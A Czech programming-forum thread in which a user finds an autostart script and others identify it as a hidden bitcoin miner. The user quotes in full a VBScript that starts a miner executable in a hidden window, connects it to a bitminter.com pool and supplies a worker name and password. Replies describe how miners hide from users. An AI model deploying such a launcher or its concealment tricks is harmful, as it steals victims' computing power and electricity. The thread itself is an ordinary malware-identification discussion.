IT rekvalifikace s garancí práce. Seniorní programátoři vydělávají až 160 000 Kč/měsíc a rekvalifikace je prvním krokem. Zjisti, jak na to!
Hledáme nové posily do ITnetwork týmu. Podívej se na volné pozice a přidej se do nejagilnější firmy na trhu - Více informací.
Avatar
rikenbekr
Člen
Avatar
rikenbekr:10.11.2016 15:08

Zdravím,
při čištění počítače jsem narazil na program který se spouští sám po startu systému, ale nezjistil jsem kde je a jaký je to proces. Jmenuje se pubpr a vydavatel je neznámý.
Předem díky za pomoc.

Odpovědět
10.11.2016 15:08
In world without fences and walls, who needs Gates and Windows?
Avatar
Petr Čech
Tvůrce
Avatar
Odpovídá na rikenbekr
Petr Čech:10.11.2016 15:22

Možná by se hodilo dát sem seznam programů, co máš nainstalované. Také se podívej, kdy byl soubor vytvořen a zkus zjistit, co by za to mohlo moct. Také projeď počítač antivirem.

Nahoru Odpovědět
10.11.2016 15:22
the cake is a lie
Avatar
rikenbekr
Člen
Avatar
rikenbekr:10.11.2016 15:33

To jsem zkoušel ale soubor jsem nenašel.

Nahoru Odpovědět
10.11.2016 15:33
In world without fences and walls, who needs Gates and Windows?
Avatar
Odpovídá na rikenbekr
Marian Benčat:10.11.2016 15:38

Ten soubor jsou printer utilitky , ktere slouzi k administraci tiskaren.

To ale neznamena, ze se za to nemuze neco vydavat. Pokud ti to nehlasi antivir, je vetsi sance ale, ze je to v poradku.

Nahoru Odpovědět
10.11.2016 15:38
Totalitní admini..
Avatar
Petr Čech
Tvůrce
Avatar
Odpovídá na rikenbekr
Petr Čech:10.11.2016 15:39

Máš tu už 149 komentářů, neříkej, že nedokážeš použít tlačítko odpovědět...
Co jsi přesně zkoušel? A nedal jsi sem ten seznam programů.

Nahoru Odpovědět
10.11.2016 15:39
the cake is a lie
Avatar
rikenbekr
Člen
Avatar
rikenbekr:10.11.2016 15:39

Tak přece, nejspíš je to toto. Ve složkách SysWOW64 System32 a je to soubor pubprn.vbs.

'----------------------------------------------------------------------
'    pubprn.vbs - publish printers from a non Windows 2000 server into Windows 2000 DS
'
'
'     Arguments are:-
'        server - format server
'        DS container - format "LDAP:\\CN=...,DC=...."
'
'
'    Copyright (c) Microsoft Corporation 1997
'   All Rights Reserved
'----------------------------------------------------------------------

'--- Begin Error Strings ---

Dim L_PubprnUsage1_text
Dim L_PubprnUsage2_text
Dim L_PubprnUsage3_text
Dim L_PubprnUsage4_text
Dim L_PubprnUsage5_text
Dim L_PubprnUsage6_text

Dim L_GetObjectError1_text
Dim L_GetObjectError2_text

Dim L_PublishError1_text
Dim L_PublishError2_text
Dim L_PublishError3_text
Dim L_PublishSuccess1_text


L_PubprnUsage1_text      =   "Použití: [cscript] pubprn.vbs server ""LDAP://OU=..,DC=..."""
L_PubprnUsage2_text      =   "       server je název serveru se systémem Windows (např.: Server) nebo název UNC tiskárny (\\Server\Tiskárna)"
L_PubprnUsage3_text      =   "       ""LDAP://CN=...,DC=..."" je cesta DS cílového kontejneru"
L_PubprnUsage4_text      =   ""
L_PubprnUsage5_text      =   "Příklad 1: pubprn.vbs ServerA ""LDAP://CN=KontejnerA,DC=Domena,DC=Spolecnost,DC=CZ"""
L_PubprnUsage6_text      =   "Příklad 2: pubprn.vbs \\ServerA\Tiskárna ""LDAP://CN=KontejnerA,DC=Domena,DC=Spolecnost,DC=CZ"""

L_GetObjectError1_text   =   "Chyba: Cesta "
L_GetObjectError2_text   =   " nebyla nalezena."
L_GetObjectError3_text   =   "Chyba: Přístup se nezdařil."

L_PublishError1_text     =   "Chyba: Program Pubprn nemůže publikovat z počítače "
L_PublishError2_text     =   " protože v počítači je spuštěn systém Windows 2000 nebo vyšší."
L_PublishError3_text     =   "Publikace tiskárny se nezdařila "
L_PublishError4_text     =   "Chyba: "
L_PublishSuccess1_text   =   "Publikovaná tiskárna: "

'--- End Error Strings ---


set Args = Wscript.Arguments
if args.count < 2 then
    wscript.echo L_PubprnUsage1_text
    wscript.echo L_PubprnUsage2_text
    wscript.echo L_PubprnUsage3_text
    wscript.echo L_PubprnUsage4_text
    wscript.echo L_PubprnUsage5_text
    wscript.echo L_PubprnUsage6_text
    wscript.quit(1)
end if

ServerName= args(0)
Container = args(1)


on error resume next
Set PQContainer = GetObject(Container)

if err then
    wscript.echo L_GetObjectError1_text & Container & L_GetObjectError2_text
    wscript.quit(1)
end if
on error goto 0



if left(ServerName,1) = "\" then

    PublishPrinter ServerName, ServerName, Container

else

    on error resume next

    Set PrintServer = GetObject("WinNT://" & ServerName & ",computer")

    if err then
        wscript.echo L_GetObjectError3_text & ServerName & ": " & err.Description
        wscript.quit(1)
    end if

    on error goto 0


    For Each Printer In PrintServer
        if Printer.class = "PrintQueue" then PublishPrinter Printer.PrinterPath, ServerName, Container
    Next


end if




sub PublishPrinter(UNC, ServerName, Container)


    Set PQ = WScript.CreateObject("OlePrn.DSPrintQueue.1")

    PQ.UNCName = UNC
    PQ.Container = Container

    on error resume next

    PQ.Publish(2)

    if err then
        if err.number = -2147024772 then
            wscript.echo L_PublishError1_text & Chr(34) & ServerName & Chr(34) & L_PublishError2_text
            wscript.quit(1)
        else
            wscript.echo L_PublishError3_text & Chr(34) & UNC & Chr(34) & "."
            wscript.echo L_PublishError4_text & err.Description
        end if
    else
        wscript.echo L_PublishSuccess1_text & PQ.Path
    end if

    Set PQ = nothing

end sub

Je tam asi 4x.
Kdybych sem měl dát seznam všech programů co mám v pc tak bych u toho ztrávil tejden :).
Za "Odpovědět" se omlouvám, ale nějakej pátek sem tu nebyl. :D

Editováno 10.11.2016 15:42
Nahoru Odpovědět
10.11.2016 15:39
In world without fences and walls, who needs Gates and Windows?
Avatar
Odpovídá na rikenbekr
Marian Benčat:10.11.2016 15:48

Je to zcela v poradku. Muzes to ignorovat.

Nahoru Odpovědět
10.11.2016 15:48
Totalitní admini..
Avatar
rikenbekr
Člen
Avatar
Odpovídá na rikenbekr
rikenbekr:10.11.2016 16:22

Tak jsem se podíval ještě jednou a je tam jeden co se jmenuje pubpr.vbs

Const HIDDEN_WINDOW = 12

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")

Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:\Windows\Inf\MSASGui.exe -o http://mint.bitminter.com:8332 -u daryl001_wrk003 -p hujavez111", null, objConfig, intProcessID)

Co to dělá?

Editováno 10.11.2016 16:23
Nahoru Odpovědět
10.11.2016 16:22
In world without fences and walls, who needs Gates and Windows?
Avatar
Odpovídá na rikenbekr
Josef Kuchař - Pepa489:10.11.2016 16:51

vypadá, že to je bitcoin miner

Nahoru Odpovědět
10.11.2016 16:51
2x piš, jednou debuguj
Avatar
Odpovídá na rikenbekr
Marian Benčat:10.11.2016 21:08

Jo todle uz skutecne malware je xD Tamto je 1:1 MS script.

Nahoru Odpovědět
10.11.2016 21:08
Totalitní admini..
Avatar
rikenbekr
Člen
Avatar
rikenbekr:11.11.2016 0:50

A co přesně to dělá?

Nahoru Odpovědět
11.11.2016 0:50
In world without fences and walls, who needs Gates and Windows?
Avatar
Adam Ježek
Tvůrce
Avatar
Odpovídá na rikenbekr
Adam Ježek:11.11.2016 1:01

Pouzivej odpovedet!
Bitcoin miner, zjednoduse receno, vyuziva pocetni vykon pocitace, provadi vypocty a uzivatel za to dostava zaplaceno.
Problem je, ze zisky sou hodne maly a aby se ti to vyplatilo, potrebujes mit hodne vykonneho HW. Takze je lepsi napsat virus, ktery vyuzije vykon ciziho pocitace, sezere cizi elektrinu, ten rozsirit a tobe pak jdou jenom zisky.
Takze jestli si mel dojem, ze mas posledni dobou nejaky pomaly pocitac, tak vykon se ztracel do penezenky nejakeho hackera.

Nahoru Odpovědět
11.11.2016 1:01
Počkej chvíli, poradím se s křišťálovou koulí.
Avatar
rikenbekr
Člen
Avatar
Odpovídá na Adam Ježek
rikenbekr:11.11.2016 14:37

No to jsem taky četl, ale počítač o moc pomalejší nebyl. A žádný neznámý proces zatěžující procesor jsem nepozoroval.

Nahoru Odpovědět
11.11.2016 14:37
In world without fences and walls, who needs Gates and Windows?
Avatar
Odpovídá na rikenbekr
Luboš Běhounek Satik:11.11.2016 14:48

Miner obvykle zatezuje hlavne GPU a aby si ho uzivatel nevsiml, tak se obvykle spousti az po chvilkove necinnosti uzivatele (treba po 30 sekundach neaktivity a jakmile pohnes mysi nebo neco udelas, tak se zase zastavi, abys o nem nevedel).

Nahoru Odpovědět
11.11.2016 14:48
https://www.facebook.com/peasantsandcastles/
Avatar
rikenbekr
Člen
Avatar
Odpovídá na Luboš Běhounek Satik
rikenbekr:11.11.2016 14:59

Aha, to by vysvětlovalo proč se počítač přehříval a proč mi stále jel jeden program na nvidii. Díky za objasnění. Je možné že se soubor obnoví z jiného zdroje co antivirus nenašel? Jak lze dále pátrat kromě použití antiviru?

Nahoru Odpovědět
11.11.2016 14:59
In world without fences and walls, who needs Gates and Windows?
Avatar
Odpovídá na rikenbekr
Luboš Běhounek Satik:11.11.2016 15:08

msconfig + process explorer, s tím většinu běžných virů odhalíš

ještě ten miner - potkal jsem i verze, co se při zobrazení správce úloh taky pauzovaly, aby bylo těžší je odhalit

Nahoru Odpovědět
11.11.2016 15:08
https://www.facebook.com/peasantsandcastles/
Avatar
rikenbekr
Člen
Avatar
Odpovídá na Luboš Běhounek Satik
rikenbekr:11.11.2016 15:18

A jen při zobrazení nebo i při spuštění a shození na lištu? Stejně bych si ho nevšiml protože zatížení grafiky tam nevidím.

Nahoru Odpovědět
11.11.2016 15:18
In world without fences and walls, who needs Gates and Windows?
Avatar
Odpovídá na rikenbekr
Luboš Běhounek Satik:11.11.2016 16:14

I na liště tuším. Ono pokud vytěžuje grafiku, tak bude i někde nahořejc mezi těma, co vytěžujou procesor, obvykle to pár procent sežere.

Nahoru Odpovědět
11.11.2016 16:14
https://www.facebook.com/peasantsandcastles/
Avatar
rikenbekr
Člen
Avatar
rikenbekr:11.11.2016 16:18

Díky všem za odpovědi a trpělivost :)

Nahoru Odpovědět
11.11.2016 16:18
In world without fences and walls, who needs Gates and Windows?
Avatar
gcx11
Tvůrce
Avatar
Odpovídá na Adam Ježek
gcx11:12.11.2016 17:23

Zdá se mi to, nebo ten skript obsahuje i jméno + heslo toho minera?

Editováno 12.11.2016 17:23
 
Nahoru Odpovědět
12.11.2016 17:23
Avatar
Adam Ježek
Tvůrce
Avatar
Odpovídá na gcx11
Adam Ježek:12.11.2016 17:24

Asi to je jenom vytvořenej účet pro mining, kde nejde změnit heslo, takhle blbej by snad nebyl :D

Nahoru Odpovědět
12.11.2016 17:24
Počkej chvíli, poradím se s křišťálovou koulí.
Avatar
ondax
Člen
Avatar
ondax:5.11.2017 19:15

jestli chceš ten miner zakázat, skus třeba CCleaner nebo se prohrabat v registrech, ale to nedoporučuju

 
Nahoru Odpovědět
5.11.2017 19:15
Děláme co je v našich silách, aby byly zdejší diskuze co nejkvalitnější. Proto do nich také mohou přispívat pouze registrovaní členové. Pro zapojení do diskuze se přihlas. Pokud ještě nemáš účet, zaregistruj se, je to zdarma.

Zobrazeno 22 zpráv z 22.